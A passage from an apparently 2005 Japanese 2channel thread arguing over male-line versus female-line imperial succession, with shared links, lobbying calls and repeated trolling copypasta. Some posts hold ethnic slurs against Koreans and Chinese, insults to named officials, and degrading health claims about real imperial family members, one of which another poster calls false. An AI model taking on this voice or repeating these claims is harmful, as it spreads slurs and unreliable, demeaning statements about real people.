      TEL:03-3379-8011 FAX:03-3379-8299
【都道府県神社庁】http://www.rirc.or.jp/data/output.cgi?id=98111201
         TEL:上記サイト FAX:上記サイト
【宇佐神宮】http://www.usajinguu.com/Frame.html
      〒872-0102 大分県宇佐市大字南宇佐2859
      TEL:0978-37-0001 FAX:0978-37-2748
【伊勢神宮】http://www.isejingu.or.jp/
      〒516-0023 三重県伊勢市宇治館町1
      TEL:0596-24-1111
      http://www.sengu.info/ ※ご意見 info@sengu.info
【出雲大社】http://www.izumooyashiro.or.jp/ ※[出雲大社御案内]->[ご記帳]に書込可
      お問い合わせ joho@izumooyashiro.or.jp
      〒699-0701 島根県出雲市大社町杵築東195
      TEL:0853-53-3100
【明治神宮】http://www.meijijingu.or.jp/
      〒151-8557 東京都渋谷区代々木神園町1-1
      TEL:03-3379-5511 FAX:03-3379-5519

291 :名無しさん@6周年:2005/11/20(日) 09:16:19 ID:4o5cH0xW0

 側室?
 ひげの基地外皇族、
 一般大衆の神経を逆なでしちゃったね。
 本音が出ちゃってあわてて前言撤回したけどもう遅い。
 残念でした。

 それはともかく、
 天皇マニアのみんなの特殊な性癖が、
 一般大衆に認めてもらえるといいね。
 まあ無理だろうけど。

292 :名無しさん@6周年:2005/11/20(日) 09:18:54 ID:T/X9COpV0
>>286
天皇陛下は女系反対だよ、おそらく。
というのは、ヒゲの殿下の発言というのは天皇陛下の発言だから。
そもそも、4年前まではヒゲの殿下は
「女性天皇は過去に居たのだからOK」だと言っていた。
それが、その後、ヒゲの殿下のお父上が一年前くらいに(例の人格発言のころ)
「女性天皇は可能だけど、お婿さんをどうするか難しいです」と言っている。

徐々に本音を語り始めたってわけ。

293 :名無しさん@6周年:2005/11/20(日) 09:56:46 ID:sbVbmXT00
とりあえずお勧めの本でも貼っておく

「皇統断絶 〜女性天皇は、皇室の終焉〜」
中川八洋 ビジネス社 税込1,680円
四六判270p ISBN 4-8284-1190-9
ttp://www.amazon.co.jp/exec/obidos/ASIN/4828411909/
ttp://bookweb.kinokuniya.co.jp/guest/cgi-bin/wshosea.cgi?KEYWORD=%8d%63%93%9d%92%66%90%e2
ttp://www.bk1.co.jp/product/2552514
ttp://www.7andy.jp/books/detail?accd=31530215

294 :名無しさん@6周年:2005/11/20(日) 10:00:20 ID:T/X9COpV0
どうでも良いが女系容認派は
何故こうも、能も無く、同じコピペを貼りまくるのか?



295 :名無しさん@6周年:2005/11/20(日) 10:04:43 ID:3CJAD/rZ0
>>294
焦ってるんじゃないのか?
それかスレを無駄に消費するための工作か。
どちらにしろ男系派の増加を嫌がってるのは明白。

296 :名無しさん@6周年:2005/11/20(日) 10:13:00 ID:uxj0ez9+0
女の犬や奴隷であるのを嬉々として受け入れハァハァしてる
奴らだろ?女系派って言うのは。きっともの凄いマザコン
なんだろうな。女性専用車両→女性専用天皇(W

297 :名無しさん@6周年:2005/11/20(日) 10:17:28 ID:AN9GR4dKO
>>291
捏造乙

298 :名無しさん@6周年:2005/11/20(日) 10:19:23 ID:ugxaAvC30
女 性 天皇は容認

女 系 天皇はちょっとマテ

ってことでいいんじゃないの
女性・女系とひと括りにするのがおかしい
マスコミの工作?

299 :名無しさん@6周年:2005/11/20(日) 10:31:05 ID:T/X9COpV0
有識者会議の最終報告では女性宮家を作ると数が鼠算式に増えていくから
本人の希望で皇籍離脱できるようになるらしい。
これは皇室の方が女系を反対した時に、
「あんたのところだけ皇籍から外しますよ」と言える為にするためだよね。
仮に秋篠宮が発言したら、秋篠宮の娘だけ外される事態になるかもしれない。
もし、女系天皇を反対できるとしたら
皇室の長である陛下だけになってしまったように思う。
ただし、その場合、皇室制度廃止とセットの発言になるでしょうね。

300 :名無しさん@6周年:2005/11/20(日) 10:39:23 ID:zCU7O96C0
この記事スレ立ってる?

http://www.yomiuri.co.jp/politics/news/20051120i203.htm
内親王の宮家創設容認、皇室典範会議が最終調整

301 :名無しさん@6周年:2005/11/20(日) 10:43:49 ID:1r+VvVTZ0
>>294
選挙前のどっかの党の工作員に似てるじゃないか。
コピペ連発。

お前等諦めるな。靖国もちょっと前までは国民の8割が反対していたんだ。
小泉が辞めるまで踏ん張ればあとは麻生or安倍が控えてるから大丈夫だ。
憲法問題のドサクサにまぎれて提出を見送らせろ。

302 :名無しさん@6周年:2005/11/20(日) 10:45:23 ID:AN9GR4dKO
>>300
詳しく見てないけど同類のは立ってたと思う。


303 :名無しさん@6周年:2005/11/20(日) 10:45:51 ID:6SxPZdna0
眞子、佳子内親王を皇籍離脱させないとは小和田の差し金か。

304 :名無しさん@6周年:2005/11/20(日) 10:46:10 ID:4o5cH0xW0

 側室?
 ひげの基地外皇族、
 一般大衆の神経を逆なでしちゃったね。
 本音が出ちゃってあわてて前言撤回したけどもう遅い。
 残念でした。

 それはともかく、
 天皇マニアのみんなの特殊な性癖が、
 一般大衆に認めてもらえるといいね。
 まあ無理だろうけど。

305 :名無しさん@6周年:2005/11/20(日) 11:06:30 ID:4HHfGyVn0
>>294
>>293
>>289-290
>>286-287
>>275>>277



306 :名無しさん@6周年:2005/11/21(月) 09:56:29 ID:MeGkbtSfO
ここにも
41:名無しさん@6周年 :2005/11/15(火) 23:10:57 ID:yUlPHwpT0
平成16年7月現在の役員名簿では、綿貫民輔さんが会長になっているね。

財団法人 昭和聖徳記念財団
http://www.f-showa.or.jp/
役員名簿
http://www.f-showa.or.jp/1_gaiyo/3_meibo.html


307 :名無しさん@6周年:2005/11/21(月) 11:36:49 ID:GOWkLVEJ0
吉川って実は学問嫌いなんだろうな。。
こういう民青みたいな活動してるやつってだいたいそう。
先生、先生とちやほやされて喜んでいるタイプ。
はっきり言って犬畜生にも劣るクズ

308 :名無しさん@6周年:2005/11/21(月) 11:41:39 ID:8gl+hQTX0
どうするよ?

新人議員全員にメル凸電凸するか?
自民党の何人の眼を覚ませばいいんだ?

今のところ麻生安倍しかいないんじゃないか?森派はなんだかんだ言って賛成しそうだし。

309 :名無しさん@6周年:2005/11/21(月) 11:48:28 ID:jl/231B40
「それによってどうこう言うことはない」
「××やむなしだ」
サヨクは言い回しで思考停止するのが好きだな。

>>308
大丈夫。森派なんか小泉切りするだろうよ。強行したら。
戦争で勝った後のチャーチルみたいなもんだ。あんなやつさくっと追放される。

310 :名無しさん@6周年:2005/11/21(月) 11:51:42 ID:8gl+hQTX0
>>309
楽観しすぎジャマイカ?

マスコミもやっと最近取り上げ始めたが、有識者会議に矛先が向いているというよりは
男系?女系?それって何なの?って感じだぞ。

有識者会議のDQNさをさっさと晒す方向にしないとまずいだろ。小泉はなんだかんだ言って支持率60%だし。

311 :名無しさん@6周年:2005/11/21(月) 12:03:00 ID:jl/231B40
それって何なの?、か。
どんな偉そうな口を利こうとも、吉川&佐々木という大馬鹿コンビによって東大総長の
権威が完膚無きまでに失墜した恥さらしな事件だったな。

偉そうなこと言ってる者どもを、周りの人間がはぁ?と思いながら見つめている構図。
ノムヒョンを見るような感覚だよ、もはや吉川&佐々木に対しては。

312 :名無しさん@6周年:2005/11/21(月) 12:06:01 ID:8gl+hQTX0
>>311
というか、東大(院)受けたがこの件で面接キャンセルしちまった。
普通に内部進学することにした。

とはいえフジに出たのあのDQN教授もうちの大学orz

313 :名無しさん@6周年:2005/11/21(月) 12:10:16 ID:/YpramTB0
八木秀次て「つくる会」のオサーンのことか


314 :名無しさん@6周年:2005/11/21(月) 12:19:25 ID:Vb1uQ3PT0
>>311
まあなんだ
東大=お花畑&サヨ ってイメージしかないです。
あこがれの最高学府でも何でもなかったな。

315 :名無しさん@6周年:2005/11/21(月) 12:34:26 ID:8U+1oV9G0
http://nagane.kimono.gr.jp/hideki/messages/27_title_msg.html
http://www.teamcg.or.jp/project/yawata/jiji01601.htm

この人たちも呼んだほうがいい。
八木氏だけでは「ああ、またつくる会か」と思われるのがオチ。


316 :名無しさん@6周年:2005/11/21(月) 13:11:09 ID:p5oqg3EN0
>>315
八幡さんのはパンクインの世間話感覚だからおいとくとしても、
長根さんのは全議員が一読しておくべき論文だよな。

317 :名無しさん@6周年:2005/11/21(月) 13:46:32 ID:xCTdVoVW0
『女性天皇論 象徴天皇制とニッポンの未来』 ←女系天皇を論じてベストセラー
中野 正志 (著) 朝日選書
ttp://www.amazon.co.jp/exec/obidos/ASIN/4022598603/ref=pd_rhf_p_1/249-0176303-8084305

その著者が某ブログで寄せたコメント↓

お節介ながら (ある「中(ちゅう)」から)
2005-11-04 22:02:23

 ご質問の大半は、拙著『女性天皇論』(朝日選書)ないし、雑誌「論座」の今年の六月号に書いておりますので、
ご足労ですが、図書館ででもお読み下さい。
(中略)
 愛子さんお一人だけにそんなに重い責任を負わせることは、ご説の通り、非人道的だと思います。
となると、象徴天皇制の廃止を志向するしかないのですが、一気に「国のあり方」を激変させるのは、
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
とても大きなリスクを伴いますから、なだらかに変えていく方が賢明でしょう。
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ですから国家の臍に近い重心の立場にある方に、やたらの期待を抱かず、
国民が権威からなるべく自立して立ち、彼らの権威をなだらかに少しずつ解放して差し上げるのが、
主権を持った国民の義務と言えるのではないでしょうか。
ttp://blog.goo.ne.jp/nishidauritarou/e/c88ff8b19bb382d1d596ce5b0f564adc

318 :名無しさん@6周年:2005/11/21(月) 13:54:33 ID:MeGkbtSfO
>>308
自民、民主、公明、国民、無所属の各党や議員にお願いします。
森派にも特にお願いします。
あと、コピペに成りますが、一般に理解して貰うは、女系、女性を分かりやすくとかじゃ駄目だよ。
皇統纂奪とか王朝変更とかワンフレーズの分かりやすいのじゃ無いと。
(これは議員にもインパクトが有るた思います)
あと、女系反対だけだと、他に方法が無いみたいで、天皇制度廃止か女性天皇容認かの2択に成る。
養子など他の方法も有る事を詳しく丁寧に、皇統の意味と共に提案しないといけない。
寛仁親王の養子方式などの表現をマスコミは無視してるからこうなる。
だから、女性、女系か解るようにでは無く、男系維持の方法や男系の意味を伝えるように主張しないと。
あと、女系と言う表現が解りにくいから誤解される。
単純に愛子様の子がどうなる程度の認識に矮小化される危険が有る。 と言うか、既にされてる。
キチンと天皇系統とは別の系統に成る、別の氏族に纂奪されると説明するよう求めないと。
愛子様の子が女系程度の矮小化された認識だと意味が無い。


319 :名無しさん@6周年:2005/11/21(月) 13:59:42 ID:bB5qVJOk0
今の天皇家の直系だけ東宮だけを過去未来に渡って崇め奉るなんて、ただの個人崇拝でしょ
皇統ありきの皇位がことの本質でありバックボーンそれが天皇家の魅力でもあり
皇位を外戚から脅かされたときの盾となる。
今ある伝統や慣習をを保持するということは個人崇拝だけに頼らずにすむということ
はやいとこ男系維持してる宮家を復活させて皇室の負担を減らしなさいな
直系の女系双系認めて宮家増やすなんてコストがかかり過ぎて早晩恨みを買うだけ

320 :名無しさん@6周年:2005/11/21(月) 15:02:24 ID:upm6gull0
自民党は今の憲法はGHQに押し付けられた憲法だから
改正したい、といっている党だから、GHQに追放された
旧宮家を復帰するのは大賛成だろう。
旧宮家復帰は憲法改正の地ならしみたいなものだ。

321 :名無しさん@6周年:2005/11/21(月) 19:58:20 ID:TaXPg1Sb0
男系維持に目覚めたらまずこれだけ嫁

天皇の価値
http://www.infosnow.ne.jp/~sevas/adult/japan/japan2.html

皇室典範改正問題の基本認識
http://www.geocities.jp/banseikkei/

基本的心持ち
「和の心」 http://nagane.kimono.gr.jp/hideki/messages/27_title_msg.html

男系男子厳守派の具体案
旧宮家復帰策 http://nippon.zaidan.info/seikabutsu/2003/01291/contents/309.htm

「女帝までは容認、女系は反対」派の具体案
旧皇族男子入婿策 http://www.angelfire.com/journal2/hikojuro/

資料
http://www.seisaku-center.net/archives/koushitsu/kouikeisyou-kihonsiryou-index.htm

322 :名無しさん@6周年:2005/11/21(月) 20:03:02 ID:wsgoCMSJ0
じゃあ、俺は尊氏やるから。

323 :名無しさん@6周年:2005/11/21(月) 20:38:47 ID:/MGwo5T80
@女性天皇と女系天皇は同義ではない
歴史上女性天皇は確かに存在します。現行の皇室典範で女性天皇が認められないだけのことですので、
これを改定することは、天皇制そのものに影響を与えることはありません。問題は女系天皇容認論です。

A万世一系とは何か
 天皇家は万世一系で世襲されます。簡単に言えば、天皇になれる資格は
父親を何代にもわたって遡っていくと初代天皇まで繋がる必要があるということです。

 これが古より現在に至るまで守られてきたことで、これを男系もしくは父系と呼びます。
例えが悪いのですが競馬のサラブレッドの条件はまさに男系を遡ると3大始祖に繋がる
サイアーラインと同じであり、この条件に当てはまらないとサラブレッドとは呼びません。
初代天皇が女系により世襲されていたのであれば、逆に男系は問題ということになる訳です。

B女系天皇は何故問題なのか
 女性天皇が問題ない理由は簡単です。仮に皇室典範が改定され、愛子内親王が即位する場合、
女性ではありますが、父親を遡ると初代天皇に繋がります。即ち男系の女性天皇の誕生となる訳です。
しかし、愛子様が全く関係ない一般人と結婚され、二人の間に誕生した親王が即位した場合、
男系即ち万世一系が崩壊する瞬間です。


女系天皇を認めるとして、
こうなります。
http://www.xxxx.nu/upload/upload/nabi/uppp17666.jpg

旧皇族の竹田、朝香、東久邇宮、北白川宮には明治天皇の内親王が嫁いでます。
さらに東久邇宮には昭和天皇の内親王が嫁いでます。
東久邇、朝香、竹田宮には若い男系男子も多数おります。
この人たちが皇族復帰するのがそんなにおかしいですか。

問題がすぐに分かる Q and A
http://www.geocities.jp/banseikkei/qa.html

324 :名無しさん@6周年:2005/11/21(月) 20:48:20 ID:Ej7B7dkz0
皇太子が出た時点で終わりなのかもしれないね。
その遠因を作ったナルチャン憲法を作ったのは粉屋の娘。

325 :猫煎餅:2005/11/21(月) 20:51:15 ID:M0+hoyvc0 ?#
>>322
僕は清麻呂

326 :妥協点:2005/11/21(月) 20:59:30 ID:59u5h7LS0
俺も保守派の一員で、個人的には雅子妃に「体外受精」など、最先端で賛否が分かれている不妊治療を試行すべきとの考えだが、
万が一、有識者会議の結論で女系天皇が決まってしまった場合、
愛子内親王(これは男系天皇で保守派的にも問題ない)は皇籍離脱させられた旧宮家など「必ず男系天皇の血を引く男性」と結婚しなければならないようにすべき。

こうすると夫婦の間に生まれる女系天皇は、血統上女系ではなくなる。

これならば保守派の最強硬派・八木秀次氏も納得できるはず(皇籍復帰させるか否かだけの違いになる)。


327 :名無しさん@6周年:2005/11/21(月) 22:43:37 ID:7ZTVeF/Q0
【意味】皇位継承会議の議長はロボット博士【不明】
http://news18.2ch.net/test/read.cgi/news2/1131455769/

328 :名無しさん@6周年:2005/11/21(月) 22:45:15 ID:CdYkYLZj0
>>322
俺ならアテルイ

329 :名無しさん@6周年:2005/11/21(月) 22:45:15 ID:i5bKwBObO
小和田天皇家反対


330 :名無しさん@6周年:2005/11/21(月) 22:47:33 ID:TBWuynXf0
 側室?
 ひげの基地外皇族、
 一般大衆の神経を逆なでしちゃったね。
 本音が出ちゃってあわてて前言撤回したけどもう遅い。
 残念でした。

 国民は愛子さま天皇の誕生を大歓迎するね。
 一般大衆にとって皇室とは=平成天皇の一家のこと。
 へんな親戚が出てきて次の天皇になりますって話は通用しない。
 それがいまの日本のコモンセンス。

 言うに事欠いてとうとうY染色体だかミトコンドリアだか知らんが、
 そんな後付けの屁理屈で一般大衆を説得できると思ってるの?本気で?
 ば〜かw

 もし平成天皇が女系を容認しても、どうせ天皇マニアは
 「あれは無理やり言わされてる!陛下の本心ではない!」
 と、火病るんだろうなw

 それはともかく、
 天皇マニアのみんなの特殊な性癖が、
 一般大衆に認めてもらえるといいね。
 まあ無理だろうけど。

331 :名無しさん@6周年:2005/11/21(月) 22:48:05 ID:g1+BQIqC0
この国会議員の方々にはホント頑張ってもらいたい、大変なことになった。
小泉が退陣するまでなんとか抵抗してくれ。

332 :名無しさん@6周年:2005/11/21(月) 22:49:46 ID:vYsGEQ2QO
>326
落としどころに見えるがまちがってる。
その子供は母親が女帝であるから天皇になる。まさに女系。
今まで女帝の子が天皇になっているが、それは父親が天皇ないしは皇太子であったことによる。
母が女帝だったことのみを理由に帝位についたものはいない。
悪しき前例となるので、却下。

333 :名無しさん@6周年:2005/11/21(月) 22:51:11 ID:RsaSvThK0
天皇制崩壊は確実。
この吉川が日本をつぶした。歴史の汚点だ。

334 :名無しさん@6周年:2005/11/21(月) 22:52:02 ID:CG0xm4i20
>>326
それでは皇道派の学者は妥協しないだろう。
八木先生は皇統は男系足るべしという
ニニギノミコト以来の伝統を重んじているのだ。
遺伝子がどうとかは関係ない。
皇統に復帰しない旧宮家は男系ではないと
反論されるだろう。


335 :名無しさん@6周年:2005/11/21(月) 22:52:38 ID:ShUIvDcr0
>>331
退陣後も小泉チルドレンがいる

336 :名無しさん@6周年:2005/11/21(月) 22:53:45 ID:8VnnrePq0
TBWuynXf0はは荒らしだから、無視したほうがいいよ
本文も読まずにあぼ〜んリストへ入れましょう

337 :名無しさん@6周年:2005/11/21(月) 22:53:57 ID:lHY5NZmD0
阻止不可能だな
小泉は歴史に残る大変な名宰相になったなw

338 :名無しさん@6周年:2005/11/21(月) 22:54:16 ID:5yHEilrgO
漏れも力になりたいよ…(´・ω・`)

339 :名無しさん@6周年:2005/11/21(月) 22:54:37 ID:a+/6ph9Q0
>>335
小泉の自民党に対する影響力がどこまで残るかだな


340 :名無しさん@6周年:2005/11/21(月) 22:56:34 ID:6+bxq+oT0
みんな呪われればいいと思うよ。
天照大御神も黙ってはいまい。

341 :名無しさん@6周年:2005/11/21(月) 22:56:44 ID:ShUIvDcr0
おまいらも有識者同様アメリカの民主主義に洗脳されて、偉くなったものですね
おかげで日本の歴史も文化も魂も台無しです

多数決選挙がどんな結果を生むのか

 こ の 有 様  ですよ。

精神面の無知ほど、怖いものはないのに。


342 :名無しさん@6周年:2005/11/21(月) 22:57:42 ID:OyqIOgvv0
女系導入は、例えば法隆寺のような国宝が天災で一部損傷したからといって、
鉄筋コンクリートで補修するが如き違和感を感じるな。

343 :名無しさん@6周年:2005/11/21(月) 23:02:13 ID:TBWuynXf0
 側室?
 ひげの基地外皇族、
 一般大衆の神経を逆なでしちゃったね。
 本音が出ちゃってあわてて前言撤回したけどもう遅い。
 残念でした。

 国民は愛子さま天皇の誕生を大歓迎するね。
 一般大衆にとって皇室とは=平成天皇の一家のこと。
 へんな親戚が出てきて次の天皇になりますって話は通用しない。
 それがいまの日本のコモンセンス。

 言うに事欠いてとうとうY染色体だかミトコンドリアだか知らんが、
 そんな後付けの屁理屈で一般大衆を説得できると思ってるの?本気で?
 ば〜かw

 もし平成天皇が女系を容認しても、どうせ天皇マニアは
 「あれは無理やり言わされてる!陛下の本心ではない!」
 と、火病るんだろうなw

 それはともかく、
 天皇マニアのみんなの特殊な性癖が、
 一般大衆に認めてもらえるといいね。
 まあ無理だろうけど。

344 :名無しさん@6周年:2005/11/21(月) 23:06:05 ID:+nbwawYmO
いや、損傷すらしていないんだよ
損傷すらしていないのに損傷の危険性があると言いながら、ぶち壊し違う建物を立ててしまえってなもん
要は最初から壊したいだけの連中と新しく安っぽい建物を建ててそこに居座りたい連中がいる

345 :名無しさん@6周年:2005/11/21(月) 23:06:30 ID:MiCYPk+B0
>>343
反日馬鹿サヨって、なんで同じコピペばかり貼ってるの?
知能がないのは分かっているが、もうちょっとマシなことできないのか?

それとも、女系容認派は支那と超賎の日本侵略の手先だってことを
分からすために貼ってる、情報操作かよ。wwww

いずれにしても、女系容認は、超賎、支那の手先!!!


346 :名無しさん@6周年:2005/11/21(月) 23:07:41 ID:kHwSiGOh0
>>1
ここで話題になってることくらいなら半日も勉強すれば十分だろ?

347 :名無しさん@6周年:2005/11/21(月) 23:08:20 ID:6rjsbrs/0
>「女性天皇を認め、継承順位は男女を問わず第一子とするのが分かりやすく、
>天皇に対し国民の親近感がわくと思う」と主張した。

別に天皇にそんなもん期待してないんだけど。
バカじゃないの?こいつ。


348 :名無しさん@6周年:2005/11/21(月) 23:10:40 ID:H4ANYLVs0
>>347
確認せんでもバカ。

ロボット吉川の愛称を考えよう。

よしかわえもん

いまいちだな。次!

349 :名無しさん@6周年:2005/11/21(月) 23:11:04 ID:ShUIvDcr0

とにかく、日本は「順」とか「正」とか「すじ」の文化だから
政治が皇室を操作するような、順に逆らうようなあり様ではダメ

欧米政治から脱して解毒しないと、日本の精神が解体されるばかりで善くはならない。
それが本当の日本の終わる時。


350 :名無しさん@6周年:2005/11/21(月) 23:12:07 ID:TBWuynXf0
>>345
 側室?
 ひげの基地外皇族、
 一般大衆の神経を逆なでしちゃったね。
 本音が出ちゃってあわてて前言撤回したけどもう遅い。
 残念でした。

 国民は愛子さま天皇の誕生を大歓迎するね。
 一般大衆にとって皇室とは=平成天皇の一家のこと。
 へんな親戚が出てきて次の天皇になりますって話は通用しない。
 それがいまの日本のコモンセンス。

 言うに事欠いてとうとうY染色体だかミトコンドリアだか知らんが、
 そんな後付けの屁理屈で一般大衆を説得できると思ってるの?本気で?
 ば〜かw

 もし平成天皇が女系を容認しても、どうせ天皇マニアは
 「あれは無理やり言わされてる!陛下の本心ではない!」
 と、火病るんだろうなw

 それはともかく、
 天皇マニアのみんなの特殊な性癖が、
 一般大衆に認めてもらえるといいね。
 まあ無理だろうけど。

351 :名無しさん@6周年:2005/11/21(月) 23:13:30 ID:EGGEBpy5O
つまり竹田クンは特権階級の人間になりたいのね。
今更、皇族ヅラされてもなぁ…
君のために納税する気にはなれない。


352 :名無しさん@6周年:2005/11/21(月) 23:13:44 ID:kHwSiGOh0
>>347
バカのほうが多いからいいんだよ

353 :名無しさん@6周年:2005/11/21(月) 23:14:19 ID:VaFAWxR70
有識者会議のバカどもははっきり言えよ
バカな国民のために継承はわかりやすくします
男系女系まぜこぜで皇統から外れますけどいいですよね
順位もおまえらバカでわかんねーだろうから直系第一子優先にするから
愛子様が苦労しようが、皇室の人数が鼠算式に増えようがバカなお前らのせいですからってよ


354 :名無しさん@6周年:2005/11/21(月) 23:15:32 ID:W/v44dar0
女系移行は有り得ず、その場合はそこで皇室終了を宣言し、
歴代の天皇の歴史や系譜を編纂する
というのが、東洋的な儀式・思想でしょう?

おそらく、皇室の歴史観でも同じはず。

だから、女系を突き進むのなら、
陛下はそこで皇室の歴史を終わりを宣言するはず。

まさか、2005年が法的な皇室の終わりになるとは思わなかった。

355 :名無しさん@6周年:2005/11/21(月) 23:21:50 ID:9Km5E6bCO
ひとまず平成天皇なんて言ってる輩はまず出直してこい

356 :名無しさん@6周年:2005/11/21(月) 23:22:07 ID:lX5Jba220
我が国が世界に誇る2665年続く万世一系の男系男子天皇制は、
国家の根幹であります。しかし極左売国の馬鹿有識者より安易な女系決定で、
破壊の危機にあります。男系男子天皇制は旧皇族の復籍で十分に維持が可能です。
しかし時間がありません。従って世論の意見をメールで送り意思を伝えましょう。
■皇室典範改正懇談会資料
http://www.kantei.go.jp/jp/singi/kousitu/
■首相官邸御意見募集フォーム
http://www.kantei.go.jp/jp/forms/goiken.html
■内閣官房御意見要望フォーム
http://www.iijnet.or.jp/cao/cas/jp/goiken.html
■自由民主党意見要望フォーム
http://www.jimin.jp/jimin/main/mono.html
■安倍晋三御意見要望フォーム
http://newleader.s-abe.or.jp/modules/contact/
■平沼赳夫意見メールアドレス
info@hiranuma.org
■男系男子知識補充頁
http://www.geocities.jp/banseikkei/
■旧皇族基礎知識事典
http://ja.wikipedia.org/wiki/%E6%97%A7%E7%9A%87%E6%97%8F

357 :名無しさん@6周年:2005/11/21(月) 23:24:06 ID:TBWuynXf0
>>355
 側室?
 ひげの基地外皇族、
 一般大衆の神経を逆なでしちゃったね。
 本音が出ちゃってあわてて前言撤回したけどもう遅い。
 残念でした。

 国民は愛子さま天皇の誕生を大歓迎するね。
 一般大衆にとって皇室とは=平成天皇の一家のこと。
 へんな親戚が出てきて次の天皇になりますって話は通用しない。
 それがいまの日本のコモンセンス。

 言うに事欠いてとうとうY染色体だかミトコンドリアだか知らんが、
 そんな後付けの屁理屈で一般大衆を説得できると思ってるの?本気で?
 ば〜かw

 もし平成天皇が女系を容認しても、どうせ天皇マニアは
 「あれは無理やり言わされてる!陛下の本心ではない!」
 と、火病るんだろうなw

 それはともかく、
 天皇マニアのみんなの特殊な性癖が、
 一般大衆に認めてもらえるといいね。
 まあ無理だろうけど。

358 :名無しさん@6周年:2005/11/21(月) 23:28:24 ID:VP0xP5IC0

        まもなくこのスレは 乂朝敵小泉討伐 戦場乂 となります。

      \∧_ヘ     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ,,、,、,,, / \〇ノゝ∩ < 朝敵小泉討伐、いくぞゴルァ!!      ,,、,、,,,
    /三√ ゚Д゚) /   \____________  ,,、,、,,,
     /三/| ゚U゚|\      ,,、,、,,,                       ,,、,、,,,
 ,,、,、,,, U (:::::::::::)  ,,、,、,,,         \オーーーーーーーッ!!/
      //三/|三|\     ∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ∪  ∪       (    )    (     )   (    )    )
 ,,、,、,,,       ,,、,、,,,  ∧_∧∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ,,、,、,,,       (    )    (    )    (    )    (    )


勅命はまだか (w

 +   +
  ∧_∧  +
 (0゚・∀・)   ワクワクテカテカ
 (0゚∪ ∪ +        
 と__)__) +


359 :名無しさん@6周年:2005/11/21(月) 23:31:55 ID:NGqZOBX40
>>ID:TBWuynXf0

おまえさ、2chって本当に匿名と思ってる?
反対意見ならば問題ないけど
皇室を侮辱するのは止めた方がいいんじゃないか?

360 :名無しさん@6周年:2005/11/21(月) 23:34:35 ID:TBWuynXf0
>>359
大正天皇はダウン症とか、美智子皇后は粒粒っ子を産んだとか
言っちゃいけないってこと?
そういう発言するとさらわれちゃうの?
天皇マニアの発想は戦前の特高警察レベルだな。

361 :名無しさん@6周年:2005/11/21(月) 23:36:36 ID:w6QMk5BC0
>>359
翻訳しよう
「ウリはどんなキチガイ発言もできるニダ」

362 :名無しさん@6周年:2005/11/21(月) 23:38:09 ID:745Tt0gE0
>>361
おまえにとっては、ダウン症であることや異常出産が
「侮辱」になるのかね?
ちなみに大正天皇はダウン症じゃないよ。病弱だったが
普通に育っている。

363 :名無しさん@6周年:2005/11/21(月) 23:38:26 ID:NGqZOBX40
>360
おまえおもしろいやつだな。

繰り返すが、お前の言葉は反対意見じゃなくてただの侮辱だ。


364 :名無しさん@6周年:2005/11/21(月) 23:40:45 ID:TBWuynXf0
天皇マニア諸君と俺はもっと遊びたい。
今夜は徹夜しようぜ。

365 :名無しさん@6周年:2005/11/21(月) 23:40:55 ID:745Tt0gE0
>>362自己レス
>>361じゃなくて>>360だ。
すまん>>361

366 :名無しさん@6周年:2005/11/21(月) 23:43:26 ID:W1pJxkyo0
>>364
こういうのに限ってとっとと寝ている

367 :名無しさん@6周年:2005/11/21(月) 23:43:31 ID:sws2cWFz0
>>360
特高警察も何も名誉毀損は民間人相手でも犯罪だろ。
ちなみに不敬罪はちゃんとある。

368 :名無しさん@6周年:2005/11/21(月) 23:45:19 ID:NGqZOBX40
>364

確かにおれは天皇崇拝者だ。しかし、マニアと言われるのは好きじゃない。
おまえは何の主義者だ?

369 : :2005/11/21(月) 23:45:50 ID:H4ANYLVs0
>>364
通報したらマジでつれてかれるが、通報しないでやるよ。>>262
ロボット君が座長で全て自分の意見を押し通しています。
議論すらしていないそうです。

370 :名無しさん@6周年:2005/11/21(月) 23:46:17 ID:TBWuynXf0
>>367
>ちなみに不敬罪はちゃんとある。
無いよこのド阿呆w
お前の脳内法律を持ち出すなよw

371 :名無しさん@6周年:2005/11/21(月) 23:47:09 ID:doW8APny0
「男女に関わらず第一子優先」なんて制度でも何でも無いやん。
何が「有識者」会議だよボケ。

372 :名無しさん@6周年:2005/11/21(月) 23:47:18 ID:745Tt0gE0
>>368
身障者や不正常出産をネタに「遊べる」奴だよ。
相手にすんな。

373 :名無しさん@6周年:2005/11/21(月) 23:48:02 ID:G947kc/K0
>>362
まあイザナギとイザナミもヒルコやアワコを生んだのだから。
日本人は昔から障害者に寛容なのだよ。(とかいって海に流したのだがw)


374 :名無しさん@6周年:2005/11/21(月) 23:48:35 ID:lCbwv0P30
男系じゃないとダメな理由は、今の天皇の血を引き継ぐことが
大事なんじゃなくて、神武天皇の血を継ぐことが大事だから
女系に流れるなら傍系にすべきってことであってる?

375 :名無しさん@6周年:2005/11/21(月) 23:49:18 ID:NGqZOBX40
>374
ok

376 :名無しさん@6周年:2005/11/21(月) 23:49:19 ID:+nbwawYmO
>>355
古舘のバカが平成天皇と言ってたな
どうしようもない

377 :名無しさん@6周年:2005/11/21(月) 23:50:26 ID:w6QMk5BC0
>>368
強いて言えば「現状肯定主義者」だろうねぇ。

378 :名無しさん@6周年:2005/11/21(月) 23:50:37 ID:745Tt0gE0
>>373
類似のモチーフは南方海洋系の神話に多いんだってね。
あー、こりゃスレ違いだけどw

379 :名無しさん@6周年:2005/11/21(月) 23:50:46 ID:2oh4+E350
今回の有識者会議の方針でいくと、将来的に確実に南北朝状態になるね。
愛子天皇が誕生するのは、3〜40年後だろうけど、天皇と認められない人が
たくさんでると思う。
自分もそのひとりだけど。

380 :名無しさん@6周年:2005/11/21(月) 23:52:03 ID:lCbwv0P30
>>375
サンキュー。

381 :名無しさん@6周年:2005/11/21(月) 23:53:19 ID:TBWuynXf0
俺は基本的にノンポリ。
あえて言えばアンチ天皇マニアだな。
お前らがどうでもいいことに狂ったように拘ってるのが気持ち悪いの。
だからなんとか嫌がらせしてやろうと思ってる。

382 :国柄護持ですよ!:2005/11/21(月) 23:54:07 ID:w6QMk5BC0
>>379
諦めちゃダメです。断固阻止ですよ!私も電話してますよ。

